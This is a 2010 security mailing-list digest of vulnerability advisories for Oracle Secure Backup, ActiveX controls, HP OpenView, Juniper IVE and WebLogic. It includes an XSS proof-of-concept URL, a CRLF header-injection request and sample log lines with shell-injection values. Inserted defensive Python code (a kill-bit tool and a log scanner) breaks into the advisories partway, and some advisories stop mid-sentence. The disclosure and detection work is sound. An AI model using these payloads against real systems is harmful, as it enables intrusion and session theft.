TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution 
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-04

-- CVE ID:
CVE-2010-0898

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8027. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Secure Backup. User interaction is
not required to exploit this vulnerability.

The specific flaw exists in the parsing of commands sent to the
obscheduled.exe service, which listens by default on TCP port 1026 or 1027.
Due to a lack of bounds checking on a specific command sequence, the
program stack can be overwritten with user-controlled data. Successful
exploitation can lead to remote system compromise under the SYSTEM
credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-03-13 - Vulnerability reported to vendor

-- Credit:
This vulnerability was discovered by:
* Cody Pierce, TippingPoint DVLabs

ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-118
July 13, 2010

-- CVSS:
9.7, (AV:N/AC:L/Au:N/C:C/I:C/A:P)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to bypass authentication on
vulnerable installations of Oracle Secure Backup. Authentication is not
required to exploit this vulnerability.

The specific flaw exists in the handling of user input to the uname
variable of the login.php script running on the administration page of
Oracle Secure Backup. Due to the lack of proper shell metacharacter
filtering it is possible to bypass the login check. Successful
exploitation of this vulnerability allows the attacker to access
sensitive information on the administration server without
proper credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

Secunia Research: GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability

2010-07-15 Thread Secunia Research
== 

 Secunia Research 15/07/2010

   - GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* GIGABYTE Dldrv2 ActiveX Control 1.4.206.11

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

GIGABYTE's Download Center allows you to quickly download and update 
your BIOS as well as the latest system drivers.

Product Link:
http://download.gigabyte.com.tw/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in GIGABYTE Dldrv2 
ActiveX Control, which can be exploited by malicious people to 
compromise a user's system.

The vulnerability is caused by missing input validation of the item
argument passed to the SetDLInfo() method and can be exploited via 
array-indexing errors to corrupt memory.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

Set the kill-bit for the ActiveX control.

== 
6) Time Table 

18/06/2010 - Vendor notified.
29/06/2010 - Vendor response.
15/07/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1518 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-86/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


ZDI-10-119: Oracle Secure Backup Administration $other Variable Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-119: Oracle Secure Backup Administration $other Variable Command 
Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-119
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability.

The specific flaw exists in the handling of variables to the
property_box.php script located on the Oracle Secure Backup
administration server. Due to the lack of filtering on special
characters it is possible to specify arbitrary commands to the command
line being executed by the administration server. Successful
exploitation of this can lead to remote compromise under the credentials
of the web server.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

[security bulletin] HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access

2010-07-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01757418
Version: 3

HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on 
HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-06-15
Last Updated: 2010-07-14

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP OpenView SNMP Emanate 
Master Agent Running on HP-UX, Linux, Solaris, and Windows. The vulnerability 
could be exploited remotely to gain unauthorized access.

References: CVE-2008-0960

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView SNMP Emanate Master Agent v15.x running on HP-UX, Solaris, Linux, 
and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference       Base Vector                     Base Score
  CVE-2008-0960   (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made patches available to resolve the vulnerability.

The patches are available from http://support.openview.hp.com/selfsolve/patches

Operating System          Patch
HP-UX (IA)                PHSS_39887 or subsequent
HP-UX (PA)                PHSS_39886 or subsequent
Linux RedHatAS2.1         LXOV_00109 or subsequent
Linux RedHat4AS-x86_64    LXOV_00110 or subsequent
Solaris                   PSOV_03522 or subsequent
Windows                   NNM_01206 or subsequent

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31 (IA)
HP-UX B.11.23 (IA)
=
OVSNMPAgent.MASTER
action: install PHSS_39887 or subsequent
URL: http://support.openview.hp.com/selfsolve/patches

HP-UX B.11.31 (PA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVSNMPAgent.MASTER
action: install PHSS_39886 or subsequent
URL: http://support.openview.hp.com/selfsolve/patches

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 15 June 2009 Initial release
Version:2 (rev.2) - 22 June 2010 Patches are available
Version:3 (rev.3) - 14 July 2010 Earlier HP-UX and Solaris patches resolve the 
vulnerability

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with 

Pwnie Awards 2010

2010-07-15 Thread Alexander Sotirov
The Pwnie Awards ceremony will return for the fourth consecutive year to the
BlackHat USA conference in Las Vegas. The award ceremony will take place
during the BlackHat reception on Thu, July 29, 2010.

The Pwnie Awards is an annual awards ceremony celebrating the achievements and
failures of security researchers and the wider security community in the past
year. We're currently accepting nominations in nine award categories:

 * Best Server-Side Bug
 * Best Client-Side Bug
 * Mass 0wnage
 * Most Innovative Research
 * Lamest Vendor Response
 * Most Overhyped Bug
 * Best Song
 * Most Epic FAIL
 * Lifetime Achievement award for hackers over 30

The deadline for nominations is Thu, July 16. To submit a nomination,
visit the Pwnie Awards site at http://pwnies.com/

For more last minute information, follow @PwnieAwards on Twitter,
http://twitter.com/PwnieAwards

For questions, please email i...@pwnie-awards.org

Alexander Sotirov
Dino Dai Zovi

ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection 
Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-120
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8778. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability.

The specific flaw exists in the handling of variables to the
property_box.php script located on the Oracle Secure Backup
administration server. Due to the lack of filtering on special
characters it is possible to specify arbitrary commands to the command
line being executed by the administration server. Successful
exploitation of this can lead to remote compromise under the credentials
of the web server.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

PR09-16: Juniper Secure Access series (Juniper IVE) Cross-Site Scripting Vulnerability

2010-07-15 Thread research
PR09-16: Juniper Secure Access series (Juniper IVE) XSS

Vulnerability found: 12th October 2009

Severity: Medium (Script injection)

Description:

There is a cross-site scripting vulnerability in the Juniper IVE web interface.

ProCheckUp found that a malformed, unauthenticated request to the IVE web
interface allows a vanilla cross-site scripting (XSS) attack.


Successfully tested on:
Juniper Networks IVE version 6.5R1 (Build 14599)

Model SA-2000


Proof of concept:

http://target-domain.foo/dana-na/auth/url_default/welcome.cgi?p=logout&c=37&u=</script><script>alert(1)</script>


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link or visits a malicious
webpage. The malicious code would run in the security context of the
vulnerable website.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.:
passwords or session IDs) to unauthorised third parties.


Fix:

Ensure that the firewall's management interface is disabled on the
Internet-connected interface by disabling WebUI within the service
options of that interface.



Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to
problems, if and only if, the Bulletin is not edited or changed in any
way, is attributed to Procheckup, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.


ZDI-10-121: Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-121: Command Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-121
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability but may be bypassed.

The specific flaw exists in the handling of the 'selector[0]' variable
to the script index.php used in the administration server running on
port 443. Due to improper filtering of user data a specially crafted
request could lead to arbitrary commands being executed under the
credentials of the service.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-27 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code 
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-122
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability but may be bypassed.

The specific flaw exists in the handling of the 'preauth' variable to
the script index.php used in the administration server running on port
443. Due to improper filtering of user data a specially crafted request
could lead to arbitrary commands being executed under the credentials of
the service.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-27 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-123
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to bypass authentication on
vulnerable installations of Oracle Secure Backup.

The specific flaw exists within the register globals emulation layer
which allows attackers to specify values for arbitrary program
variables. When specific parameters are specified via the URI it is
possible for an attacker to bypass the authentication mechanism and
reach functionality otherwise inaccessible without proper credentials.
This can be leveraged by remote attackers to trigger what were post-auth
vulnerabilities without valid credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-28 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

SAPGui BI wadmxhtml.dll Tags Property Heap Corruption

2010-07-15 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who
- 
SAP
http://www.sap.com

What
- 
SAPGui BI component

File:  %PROGRAMFILES%\sap\business explorer\bi\wadmxhtml.dll
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
KillBitSet: False

How
- 
Vulnerable Property: Tags

The Tags property can be manipulated to trigger heap corruption
resulting in the execution of arbitrary code.


Fix
- 

SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.
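The kill-bit mitigation named in the Secunia advisory above (section 5) and in the SAPGui Fix section, as an added example written for this digest rather than vendor code: it generates the .reg fragment that Microsoft KB240797 describes for the wadmxhtml.dll CLSID quoted above, and audits a registry export for controls whose kill bit is not set. The export is constructed, and its second CLSID is a placeholder.

```python
"""Generate and audit the ActiveX kill bit (the mitigation named above for
the GIGABYTE Dldrv2 and SAPGui wadmxhtml.dll controls). Added example, not
vendor code; the SAPGui CLSID is the one quoted in the advisory, the
registry export below is constructed and its second CLSID is a placeholder."""
import re

# Per Microsoft KB240797: a control is kill-bitted when bit 0x400 is set in
# the "Compatibility Flags" DWORD under this key (both views on 64-bit).
KILL_BIT = 0x400
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
              r"\Internet Explorer\ActiveX Compatibility")
COMPAT_KEY_WOW64 = COMPAT_KEY.replace(r"\Microsoft\Internet",
                                      r"\Wow6432Node\Microsoft\Internet")
CLSID_RE = re.compile(
    r"^\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?$")

# ClassID quoted in the SAPGui advisory above.
SAPGUI_WADMXHTML_CLSID = "30DD068D-5AD9-434C-AAAC-46ABE37194EB"

# Constructed registry export: the SAPGui control without the kill bit and a
# placeholder CLSID with it set.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{30DD068D-5AD9-434C-AAAC-46ABE37194EB}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000400
"""


def normalize_clsid(clsid):
    """Return the CLSID in canonical {UPPERCASE} form or raise ValueError."""
    m = CLSID_RE.match(clsid.strip())
    if not m:
        raise ValueError("not a CLSID: %r" % (clsid,))
    return "{%s}" % m.group(1).upper()


def kill_bit_reg(clsid, wow64=True):
    """Build .reg text that sets the kill bit for clsid (KB240797 method)."""
    key = normalize_clsid(clsid)
    roots = [COMPAT_KEY] + ([COMPAT_KEY_WOW64] if wow64 else [])
    lines = ["Windows Registry Editor Version 5.00", ""]
    for root in roots:
        lines += ["[%s\\%s]" % (root, key),
                  '"Compatibility Flags"=dword:%08x' % KILL_BIT, ""]
    return "\n".join(lines)


def kill_bits_in_export(reg_text):
    """Parse a .reg export; map each CLSID under the compatibility key to
    whether its kill bit is set (False when the value is absent or lacks
    0x400). If a CLSID appears in both registry views, the last one wins."""
    result = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = None
            parent, _, leaf = line[1:-1].rpartition("\\")
            if (parent.lower().endswith("activex compatibility")
                    and CLSID_RE.match(leaf)):
                current = normalize_clsid(leaf)
                result.setdefault(current, False)
        elif current and line.lower().startswith('"compatibility flags"=dword:'):
            flags = int(line.split("dword:", 1)[1], 16)
            result[current] = bool(flags & KILL_BIT)
    return result


def missing_kill_bits(reg_text, clsids):
    """Return the subset of clsids whose kill bit is not set in the export."""
    have = kill_bits_in_export(reg_text)
    return [c for c in map(normalize_clsid, clsids) if not have.get(c, False)]


if __name__ == "__main__":
    print(missing_kill_bits(SAMPLE_EXPORT, [SAPGUI_WADMXHTML_CLSID]))
    print(kill_bit_reg(SAPGUI_WADMXHTML_CLSID))
```

The audit reads an export produced by `reg export` of the compatibility key; it does not touch the live registry.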

Credit
- 
Elazar Broad



ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command Injection Remote Code Execution Vulnerabilities

2010-07-15 Thread ZDI Disclosures
ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command 
Injection Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-124
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit these vulnerabilities.

The specific flaws exist due to how the application passes CGI
parameters to the internal obtool binary running on port 443. Due to
improper filtering of user data a specially crafted request could lead
to arbitrary commands being executed under the credentials of the
service.
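The Oracle Secure Backup advisories above (ZDI-10-118 through ZDI-10-124) all describe unfiltered shell metacharacters reaching obtool or the login check through the same few PHP scripts. As an added example, not code from Oracle or ZDI, the following scans Apache combined-format access logs for requests to those scripts that carry metacharacters in the parameters the advisories name; the log lines are constructed and the log format is an assumption.

```python
"""Flag requests to the Oracle Secure Backup web admin scripts whose
parameters carry shell metacharacters (the pattern behind ZDI-10-118,
-119, -120, -121, -122 and -124). Added example; log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Metacharacters that let a value escape a shell command line; none of
# them belongs in a user name, object name or preauth token.
SHELL_META = re.compile(r"[;&|`$(){}<>\r\n]")

# Script basename -> parameters the advisories name, or None for "any
# parameter" (property_box.php passes several, e.g. $other, objectname).
WATCHED = {
    "login.php": {"uname"},
    "property_box.php": None,
    "index.php": {"preauth", "selector[0]"},
}

# Apache combined log format, as assumed for the constructed sample.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: one benign login, then four requests from one host.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2010:10:01:02 -0500] "GET /login.php?uname=admin&passwd=x HTTP/1.1" 200 512
10.0.0.9 - - [13/Jul/2010:10:01:09 -0500] "GET /login.php?uname=a%27%3Bid%3B%27 HTTP/1.1" 200 640
10.0.0.9 - - [13/Jul/2010:10:02:11 -0500] "GET /index.php?preauth=x%7Cls HTTP/1.1" 200 1024
10.0.0.9 - - [13/Jul/2010:10:02:40 -0500] "POST /property_box.php?objectname=host1 HTTP/1.1" 200 300
10.0.0.9 - - [13/Jul/2010:10:03:01 -0500] "GET /index.php?selector%5B0%5D=a%60whoami%60 HTTP/1.1" 200 700
"""


def parse_line(line):
    """Split one combined-format line into fields, path and query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values: a parameter that is merely present still matters
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def findings_for(rec):
    """Return (reason, param, decoded value) tuples for one parsed record."""
    # OSB may be installed under a path prefix, so match on the basename.
    script = rec["path"].rsplit("/", 1)[-1]
    if script not in WATCHED:
        return []
    watched = WATCHED[script]
    out = []
    for name, value in rec["params"]:
        if watched is not None and name not in watched:
            continue
        # parse_qsl already decoded once; decode again to catch
        # double-encoded values such as %253B.
        value = unquote(value)
        if SHELL_META.search(value):
            out.append(("shell-metachar", name, value))
    return out


def scan(log_text):
    """Scan a whole log; return (ip, path, reason, param, value) alerts."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for reason, name, value in findings_for(rec):
            alerts.append((rec["ip"], rec["path"], reason, name, value))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("ALERT %s %s %s %s=%r" % alert)
```

POST bodies are not recorded in access logs, so this catches only parameters sent in the URL; a reverse proxy or WAF in front of the administration server sees both.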

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-12-10 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Andrea Micalizzi aka rgod

CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs

2010-07-15 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
 Release Date: 2010-07-13
  Application: WebLogic Plugin
     Versions: All known versions
     Severity: High
Discovered by: Timothy D. Morgan <tmorgan (at) vsecurity {dot} com>
 Contributors: George D. Gal <ggal {at} vsecurity (dot) com>
Vendor Status: Patch Released [4]
CVE Candidate: CVE-2010-2375
    Reference: http://www.vsecurity.com/resources/advisory/20100713-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
The product is best described by Oracle marketing literature in:

 Oracle WebLogic Server Enterprise Edition offers enterprises the ability to
  consolidate their applications on a pool of shared servers for both high 
  efficiency and superior performance. No other application server has
  the proven performance on industry benchmarks across the most varied
  chip types and operating systems.  Sophisticated High Availability
  (HA) features built on clustered instances ensure uptime. Easy-to-use
  yet substantial management tools keep systems going without hassle or
  expense. By coalescing applications and services onto Oracle WebLogic
  Server, IT is in position to react swiftly to change and help the
  enterprise outperform the competition. -- [1]

And:
 Oracle WebLogic Server Web Server Plugins provide load balancing
  across WebLogic Server Clusters by acting as front-end proxies. While
  WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic
  Server, these new WebLogic Server Web Server Plugins 1.1 are
  downloadable separately outside of WebLogic Server and deliver
  enhanced functionality and improved security. -- [2]


Vulnerability Overview
----------------------
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs.  In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.


Product Background
------------------
WebLogic application server is commonly deployed in a three-tier
architecture where the application server resides behind a public-facing
web server. Oracle provides proprietary web server plugin modules for
multiple web server software packages on various platforms in order to
allow these services to act as reverse proxies and in some cases, load
balancers for multiple middle-tier WebLogic application servers.


Vulnerability Overview
----------------------
The vulnerability stems from the web server plugin's processing of URLs
submitted by users.  When a URL is received, it is URL decoded at some
point, but is not re-encoded prior to inclusion in requests to the
middle-tier WebLogic server.  This allows for special characters, such
as new lines, to be injected into requests directed at application
servers.

For instance, if an attacker were to send the following simple request: 

 GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

The web server proxy module would instead send a request on to the 
application server which looks more like:

 GET /logo.gif HTTP/1.1
 X-hdr: x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

This behavior allows for a wide variety of attacks, including trusted
header injection and HTTP request smuggling.


Attack Scenarios
----------------
In the simplest scenarios, an attacker could use this flaw to inject
malicious versions of headers which are considered trusted.  In certain
situations, headers are added to requests by the web server proxy module
which may be used to make decisions about authentication or access
control.  

For instance, the WL-Proxy-Client-IP header is added to requests to
indicate to the application server which IP address the client used.  If
the application server uses this to enforce IP-based access control
restrictions, then clearly this injection vulnerability could be used to
bypass this restriction.

Another example would be the injection of a WL-Proxy-Client-Cert
header.  This header is used in deployments where clients are provided
SSL/TLS client certificates for authentication.  Since web servers would
